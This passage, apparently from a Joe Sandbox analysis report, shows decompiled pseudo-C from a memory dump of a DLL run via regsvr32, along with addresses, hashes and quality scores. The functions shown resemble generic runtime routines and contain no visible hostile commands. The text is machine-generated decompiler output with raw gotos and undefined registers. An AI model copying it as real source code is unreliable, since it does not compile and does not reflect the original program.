                                                                      				E0000000118003AA20(_t59, __rcx, _t68, __rdx, _t74, _t75, _t79);
                                                                      				goto 0x8001ed0c;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001ecfe;
                                                                      				_t45 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x8001ecba;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x8001ed0c;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E00000001180015A5C(_t43, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001ecb2;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E0000000118003AA20(_t63, _t65, _t69, _t72, _t74, _t75, _t79);
                                                                      				goto 0x8001ecb5;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t63 * 8))));
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001ec14
                                                                      0x18001ec25
                                                                      0x18001ec28
                                                                      0x18001ec2a
                                                                      0x18001ec2f
                                                                      0x18001ec33
                                                                      0x18001ec37
                                                                      0x18001ec3a
                                                                      0x18001ec49
                                                                      0x18001ec4b
                                                                      0x18001ec51
                                                                      0x18001ec54
                                                                      0x18001ec59
                                                                      0x18001ec5d
                                                                      0x18001ec64
                                                                      0x18001ec6a
                                                                      0x18001ec6f
                                                                      0x18001ec74
                                                                      0x18001ec7b
                                                                      0x18001ec8b
                                                                      0x18001ec8d
                                                                      0x18001ec97
                                                                      0x18001ec9b
                                                                      0x18001eca3
                                                                      0x18001eca5
                                                                      0x18001ecab
                                                                      0x18001ecaf
                                                                      0x18001ecb2
                                                                      0x18001ecb8
                                                                      0x18001ecba
                                                                      0x18001ecbe
                                                                      0x18001ecc4
                                                                      0x18001ecce
                                                                      0x18001ecd0
                                                                      0x18001ecd4
                                                                      0x18001ecd7
                                                                      0x18001ecde
                                                                      0x18001ece2
                                                                      0x18001ece9
                                                                      0x18001eced
                                                                      0x18001ecf2
                                                                      0x18001ecf7
                                                                      0x18001ecfc
                                                                      0x18001ed08
                                                                      0x18001ed16

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65f3ba26ec9f91716d7d08011faf70534c9186604ac1b1796ffa3a1d08209a3a
                                                                      • Instruction ID: 60934aa9fc83a82801e409e1e941408ac63ea19efde77e4a9ef53c52d5078eb0
                                                                      • Opcode Fuzzy Hash: 65f3ba26ec9f91716d7d08011faf70534c9186604ac1b1796ffa3a1d08209a3a
                                                                      • Instruction Fuzzy Hash: 19319372205BC885EB668F29E4513AD7BA0E39EB8CF158116EB8D0B751CF36C596CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180024C54(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				signed int _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t64;
                                                                      				intOrPtr _t67;
                                                                      				signed int* _t71;
                                                                      				signed int _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_t78 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80024c80;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8) & 0x0000ffff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x80024d4f;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80024cc1;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t58, __rcx, _t67, __rdx, _t73, _t74, __r8);
                                                                      				goto 0x80024d51;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80024d41;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80024cfd;
                                                                      				 *_t71 = 1;
                                                                      				_t71[1] = r9w;
                                                                      				_t71[4] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80024d51;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				if (E00000001180010A8C(_t64, _t64, _t71, _t73, _t79) != 0) goto 0x80024cf5;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t62, _t64, _t64, _t71, _t73, _t74, _t78);
                                                                      				goto 0x80024cf8;
                                                                      				 *_t71 = _t62;
                                                                      				return 1;
                                                                      			}

















                                                                      0x180024c54
                                                                      0x180024c54
                                                                      0x180024c65
                                                                      0x180024c68
                                                                      0x180024c6a
                                                                      0x180024c6f
                                                                      0x180024c73
                                                                      0x180024c78
                                                                      0x180024c7b
                                                                      0x180024c8a
                                                                      0x180024c8c
                                                                      0x180024c92
                                                                      0x180024c95
                                                                      0x180024c9a
                                                                      0x180024c9e
                                                                      0x180024ca5
                                                                      0x180024cab
                                                                      0x180024cb0
                                                                      0x180024cb5
                                                                      0x180024cbc
                                                                      0x180024ccc
                                                                      0x180024cce
                                                                      0x180024cd8
                                                                      0x180024cdd
                                                                      0x180024ce5
                                                                      0x180024ce7
                                                                      0x180024ced
                                                                      0x180024cf2
                                                                      0x180024cf5
                                                                      0x180024cfb
                                                                      0x180024cfd
                                                                      0x180024d01
                                                                      0x180024d11
                                                                      0x180024d13
                                                                      0x180024d17
                                                                      0x180024d1a
                                                                      0x180024d21
                                                                      0x180024d25
                                                                      0x180024d2c
                                                                      0x180024d30
                                                                      0x180024d35
                                                                      0x180024d3a
                                                                      0x180024d3f
                                                                      0x180024d4c
                                                                      0x180024d5b

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2af8ad98c1301ebe9c45c1c3bc4bb47ff8d3a6c966baac8418eec5f49d1bacc
                                                                      • Instruction ID: a70256077d84cc35ff7aba91ce2a9ef3c151c98bc7a591c67576a12b47991c45
                                                                      • Opcode Fuzzy Hash: f2af8ad98c1301ebe9c45c1c3bc4bb47ff8d3a6c966baac8418eec5f49d1bacc
                                                                      • Instruction Fuzzy Hash: EB31A273205A48C6EBA28F29E0403AD77A0F38DB8CF658125EB8D4B751DF36C596DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180022D00(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed long long _v24;
                                                                      				signed long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t64;
                                                                      				intOrPtr _t67;
                                                                      				signed long long* _t71;
                                                                      				signed long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_t78 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80022d2b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8);
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x80022df9;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80022d6c;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t58, __rcx, _t67, __rdx, _t73, _t74, __r8);
                                                                      				goto 0x80022dfb;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80022dec;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80022da8;
                                                                      				 *_t71 = 1;
                                                                      				_t71[0] = r9w;
                                                                      				_t71[2] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80022dfb;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				if (E00000001180017AF4(_t64, _t64, _t71, _t73, _t79) != 0) goto 0x80022da0;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t62, _t64, _t64, _t71, _t73, _t74, _t78);
                                                                      				goto 0x80022da3;
                                                                      				 *_t71 = _t62;
                                                                      				return 1;
                                                                      			}

















                                                                      0x180022d00
                                                                      0x180022d00
                                                                      0x180022d11
                                                                      0x180022d14
                                                                      0x180022d16
                                                                      0x180022d1b
                                                                      0x180022d1f
                                                                      0x180022d23
                                                                      0x180022d26
                                                                      0x180022d35
                                                                      0x180022d37
                                                                      0x180022d3d
                                                                      0x180022d40
                                                                      0x180022d45
                                                                      0x180022d49
                                                                      0x180022d50
                                                                      0x180022d56
                                                                      0x180022d5b
                                                                      0x180022d60
                                                                      0x180022d67
                                                                      0x180022d77
                                                                      0x180022d79
                                                                      0x180022d83
                                                                      0x180022d88
                                                                      0x180022d90
                                                                      0x180022d92
                                                                      0x180022d98
                                                                      0x180022d9d
                                                                      0x180022da0
                                                                      0x180022da6
                                                                      0x180022da8
                                                                      0x180022dac
                                                                      0x180022dbc
                                                                      0x180022dbe
                                                                      0x180022dc2
                                                                      0x180022dc5
                                                                      0x180022dcc
                                                                      0x180022dd0
                                                                      0x180022dd7
                                                                      0x180022ddb
                                                                      0x180022de0
                                                                      0x180022de5
                                                                      0x180022dea
                                                                      0x180022df6
                                                                      0x180022e05

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: adaf4ebae6ca829ad4b22997cbe19f7bb1fd488f99f3643dc50d7427465b59d6
                                                                      • Instruction ID: 69e4d1b49d1f4d964e16c4aecc2b9f4b3f8b64c19bd0a78d6674caccb61fe860
                                                                      • Opcode Fuzzy Hash: adaf4ebae6ca829ad4b22997cbe19f7bb1fd488f99f3643dc50d7427465b59d6
                                                                      • Instruction Fuzzy Hash: 3131D173214A48C6EBA28F29E0407AD77A0F38CB8CF648125EB9D4B751CF36C596DB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E0000000118001ED54(void* __eax, long long __rbx, long long __rcx, intOrPtr* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				signed int _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				signed int* _t71;
                                                                      				signed int _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t78;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001ed81;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8) & 0x0000ffff;
                                                                      				 *__rdx = r8w;
                                                                      				goto 0x8001ee50;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001edc2;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t58, __rcx, _t67, __rdx, _t73, _t74, _t78);
                                                                      				goto 0x8001ee52;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x8001ee42;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x8001edfe;
                                                                      				 *_t71 = 1;
                                                                      				_t71[1] = r9w;
                                                                      				_t71[4] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x8001ee52;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180010A8C(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x8001edf6;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t62, _t64, _t68, _t71, _t73, _t74, _t78);
                                                                      				goto 0x8001edf9;
                                                                      				 *_t71 =  *( *(_t68 + 0x488 + _t62 * 8)) & 0x0000ffff;
                                                                      				return 1;
                                                                      			}



















                                                                      0x18001ed54
                                                                      0x18001ed65
                                                                      0x18001ed68
                                                                      0x18001ed6a
                                                                      0x18001ed6f
                                                                      0x18001ed73
                                                                      0x18001ed78
                                                                      0x18001ed7c
                                                                      0x18001ed8b
                                                                      0x18001ed8d
                                                                      0x18001ed93
                                                                      0x18001ed96
                                                                      0x18001ed9b
                                                                      0x18001ed9f
                                                                      0x18001eda6
                                                                      0x18001edac
                                                                      0x18001edb1
                                                                      0x18001edb6
                                                                      0x18001edbd
                                                                      0x18001edcd
                                                                      0x18001edcf
                                                                      0x18001edd9
                                                                      0x18001edde
                                                                      0x18001ede6
                                                                      0x18001ede8
                                                                      0x18001edee
                                                                      0x18001edf3
                                                                      0x18001edf6
                                                                      0x18001edfc
                                                                      0x18001edfe
                                                                      0x18001ee02
                                                                      0x18001ee08
                                                                      0x18001ee12
                                                                      0x18001ee14
                                                                      0x18001ee18
                                                                      0x18001ee1b
                                                                      0x18001ee22
                                                                      0x18001ee26
                                                                      0x18001ee2d
                                                                      0x18001ee31
                                                                      0x18001ee36
                                                                      0x18001ee3b
                                                                      0x18001ee40
                                                                      0x18001ee4d
                                                                      0x18001ee5c

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f6c2885d073b13966d6eef6bceaac8cb61cd051f5a9b02440e1ad5de2c4d5924
                                                                      • Instruction ID: 53847be7e8560aceb1b450f72ec135407ed39f1159275521a6895c82ba89c83e
                                                                      • Opcode Fuzzy Hash: f6c2885d073b13966d6eef6bceaac8cb61cd051f5a9b02440e1ad5de2c4d5924
                                                                      • Instruction Fuzzy Hash: 1731A472214A94C6EB618F29E0403AD77A0F78DF8CF248116EB8D4B751DF36C596D704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180024D5C(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80024d87;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x80024e56;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80024dc8;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80024e58;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80024e48;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80024e04;
                                                                      				 *_t71 = 1;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80024e58;
                                                                      				_v24 = _t43;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180010A8C(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80024dfc;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80024dff;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180024d5c
                                                                      0x180024d6d
                                                                      0x180024d70
                                                                      0x180024d72
                                                                      0x180024d77
                                                                      0x180024d7f
                                                                      0x180024d82
                                                                      0x180024d91
                                                                      0x180024d93
                                                                      0x180024d99
                                                                      0x180024d9c
                                                                      0x180024da1
                                                                      0x180024da5
                                                                      0x180024dac
                                                                      0x180024db2
                                                                      0x180024db7
                                                                      0x180024dbc
                                                                      0x180024dc3
                                                                      0x180024dd3
                                                                      0x180024dd5
                                                                      0x180024ddf
                                                                      0x180024de4
                                                                      0x180024dec
                                                                      0x180024dee
                                                                      0x180024df4
                                                                      0x180024df9
                                                                      0x180024dfc
                                                                      0x180024e02
                                                                      0x180024e04
                                                                      0x180024e08
                                                                      0x180024e0e
                                                                      0x180024e18
                                                                      0x180024e1a
                                                                      0x180024e1e
                                                                      0x180024e21
                                                                      0x180024e28
                                                                      0x180024e2c
                                                                      0x180024e33
                                                                      0x180024e37
                                                                      0x180024e3c
                                                                      0x180024e41
                                                                      0x180024e46
                                                                      0x180024e53
                                                                      0x180024e62

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dca01370c94c6cdb0a424746daf8643f2fdf7691b68a4d2f3e6174545a122e38
                                                                      • Instruction ID: 7e2680c71fe099145b57f8ffe708d5876196aa24db643aeb35a088f76dde0fa7
                                                                      • Opcode Fuzzy Hash: dca01370c94c6cdb0a424746daf8643f2fdf7691b68a4d2f3e6174545a122e38
                                                                      • Instruction Fuzzy Hash: DD315E73204A88C6EB628F29E4403AD77A0F789B8CF668125EB5D4B751DF36C596C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180022E08(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80022e33;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x80022f02;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80022e74;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80022f04;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80022ef4;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80022eb0;
                                                                      				 *_t71 = 2;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80022f04;
                                                                      				_v24 = _t43;
                                                                      				r8d = 2;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180017AF4(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80022ea8;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
